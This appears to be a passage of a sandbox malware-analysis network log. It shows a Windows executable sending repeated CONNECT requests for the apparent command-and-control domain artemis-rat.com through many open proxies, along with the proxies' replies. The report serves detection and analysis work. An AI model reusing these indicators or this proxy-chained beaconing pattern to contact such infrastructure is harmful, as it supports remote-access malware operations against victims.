                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.110829115 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2112192.168.2.55546847.229.171.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.810447931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592629910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2113192.168.2.55261962.171.133.6631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.811341047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.387465954 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2114192.168.2.555448102.132.48.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.821290016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2115192.168.2.554748103.66.232.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.821599960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2116192.168.2.552749163.172.149.133163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.822684050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905062914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.921617031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.010808945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2117192.168.2.55482851.158.72.165163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.823415995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905056000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.792881012 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2118192.168.2.554900121.128.194.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.823529959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2119192.168.2.55489058.75.126.23541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.823622942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2120192.168.2.55548072.37.217.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.824636936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2121192.168.2.555490212.108.155.20590903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.831319094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2122192.168.2.552841181.78.11.2179993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.841247082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2123192.168.2.55549293.87.49.8680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.841284990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.175107002 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2124192.168.2.555047162.214.121.173643823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.851054907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.405066967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2125192.168.2.555348185.212.60.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.851721048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.203687906 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2126192.168.2.552900162.241.50.179481563876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.854913950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905060053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2127192.168.2.55500038.49.143.11480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.888017893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.167880058 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2128192.168.2.555495196.20.125.12980833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.888091087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2129192.168.2.555456192.252.208.70142823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.894401073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2130192.168.2.55549445.11.95.16560103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.894615889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2131192.168.2.55503968.169.59.17183803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.895031929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905105114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.921629906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2132192.168.2.55284845.117.179.17965223876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.895245075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2133192.168.2.552889173.212.209.216271383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.901482105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905106068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.921634912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.010822058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2134192.168.2.55499931.148.7.13031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.904371023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2135192.168.2.554981201.149.127.2280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.904512882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.273437977 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
